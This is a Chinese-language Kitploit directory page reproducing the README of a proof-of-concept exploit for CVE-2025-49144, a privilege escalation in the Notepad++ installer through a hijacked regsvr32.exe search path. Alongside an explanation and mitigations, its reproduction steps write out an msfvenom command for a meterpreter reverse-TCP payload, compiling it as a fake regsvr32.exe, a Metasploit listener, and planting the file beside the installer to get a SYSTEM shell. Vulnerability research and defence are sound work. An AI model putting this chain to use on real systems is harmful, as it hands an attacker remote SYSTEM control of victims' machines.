Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-49144_PoC — CVE-2025-49144 概念验证(PoC)供安全研究人员测试和尝试。 | Kitploit
工具/GitHubGitHub/thetorjancaptain/cve-2025-49144_poc
权限提升漏洞分析漏洞利用横向移动渗透测试学习与教育Payload 开发二进制利用
GitHubthetorjancaptain/cve-2025-49144_poc

CVE-2025-49144_PoC

CVE-2025-49144 概念验证(PoC)供安全研究人员测试和尝试。

查看仓库
8828501年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-49144_PoC

PoC Flow

📌 CVE-2025-49144 是一个高危本地权限提升漏洞,存在于 Notepad++ v8.8.1 及之前版本的安装程序中。该漏洞源于安装过程中不受控制的可执行文件搜索路径行为,允许本地攻击者通过在安装程序所在目录放置恶意可执行文件来获取 SYSTEM 级权限。


⚙️ 漏洞原理 – 逐步解析:

🧱 1. 安装程序哪里出了问题?

Notepad++ 安装程序(v8.8.2 之前)调用 regsvr32.exe 注册某些组件,但未提供完整路径(如 C:\Windows\System32\regsvr32.exe)。

相反,它只运行:

root@kitploit:~
regsvr32.exe some_dll

📂 2. Windows 搜索路径行为: 当可执行文件未指定完整路径时,Windows 使用特定搜索顺序查找文件:

  1. 启动应用程序的文件夹(例如 Downloads)
  2. 系统文件夹 (System32)
  3. Windows 文件夹
  4. 当前工作目录
  5. PATH 环境变量中的路径

因此,如果假的 regsvr32.exe 被放在安装程序同一文件夹(如 Downloads)中,Windows 会优先使用它而不是真正的 regsvr32.exe。

💣 3. 利用方法:

root@kitploit:~
- 攻击者在合法 Notepad++ 安装程序所在文件夹(例如受害者 Downloads 文件夹)放置一个恶意的 regsvr32.exe。
- 受害者运行安装程序(以为安全)。
- 安装程序调用 regsvr32.exe,但实际执行的是同一文件夹中的恶意版本——且具有 SYSTEM 权限(因为安装程序通常请求管理员权限)。
- 攻击者的载荷现在以 NT AUTHORITY\SYSTEM 权限运行。

⚙️ 复现步骤:

  1. 生成 shellcode:
root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
  1. 下载文件 "regsvr32_loader.c" 并编辑。
  2. 将 shellcode.txt 中的全部 shellcode 粘贴到注释指示位置。
  3. 编译为 regsvr32.exe:
root@kitploit:~
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
  1. 部署 meterpreter 监听器:
root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
  1. 下载一个受影响的 Notepad++ 版本,即 v8.8.1 之前的版本(v8.8.1 现已自动更新)。PoC 中我使用了 Notepad++ v8.6.8。
  2. 将文件 "regsvr32.exe" 移动到 Windows 系统中与 Notepad++ 安装程序相同的文件夹内,通常在 Downloads 文件夹。
  3. 完成 Notepad++ 安装程序的安装。

注意:这是一个 PoC,已在关闭 Windows Defender 和实时保护的情况下测试通过。


✅ 缓解措施

用户和管理员应:

  • 升级到 Notepad++ v8.8.2 或更高版本
  • 限制软件安装权限,仅授权可信管理员
  • 使用 AppLocker、WDAC 或软件限制策略 (SRP) 来:
    • 阻止从用户可写文件夹(如 Downloads)执行程序
    • 防止从未经授权路径执行不受信任的二进制文件(如 regsvr32.exe)
    • 强制要求可执行文件进行代码签名

安全团队应定期审计安装路径、监控写入权限,并观察安装程序执行期间的行为,以减少攻击面。


🏷️ 许可协议

MIT 许可证 — 仅限教育、研究和防御用途。


🤝 贡献

欢迎提交 Pull Request — 改进检测、添加功能或提供修复建议。


⚠️ 免责声明

本 PoC 仅用于教育和研究目的。使用风险自负。作者不对任何滥用或损害负责。

下载工具